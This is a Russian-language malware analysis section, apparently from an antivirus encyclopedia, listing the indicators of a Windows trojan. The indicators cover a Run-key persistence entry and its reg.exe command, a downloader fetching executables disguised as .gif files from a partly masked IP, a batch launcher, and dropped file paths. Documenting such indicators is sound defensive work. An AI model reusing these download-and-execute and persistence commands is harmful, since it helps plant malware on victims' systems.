Техническая информация
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'turniton' = '%TEMP%\ieexplorer.exe'
- '%TEMP%\ieexplorer.exe'
- '%TEMP%\antimalware.exe'
- '%TEMP%\dw.exe' http://19#.#26.211.12/pma/nginxx.gif ""%TEMP%\antimalware.exe""
- '%TEMP%\punsh.exe'
- '%TEMP%\dw.exe' http://19#.#26.211.12/pma/nginx.gif ""%TEMP%\ieexplorer.exe""
- '%TEMP%\antimalware.exe' (загружен из сети Интернет)
- '%TEMP%\ieexplorer.exe' (загружен из сети Интернет)
- '<SYSTEM32>\reg.exe' add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "turniton" /t REG_SZ /d "%TEMP%\ieexplorer.exe" /f
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\1.tmp\load1_link.bat" "
- C:\yacon.txt
- %TEMP%\ieexplorer.exe
- %TEMP%\antimalware.exe
- %TEMP%\dw.exe
- %TEMP%\punsh.exe
- %TEMP%\1.tmp\load1_link.bat
- %TEMP%\1.tmp\load1_link.bat
- C:\yacon.txt
- '19#.#26.211.12':80
- 19#.#26.211.12/pma/nginxx.gif
- 19#.#26.211.12/pma/nginx.gif
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'
- ClassName: 'EDIT' WindowName: '(null)'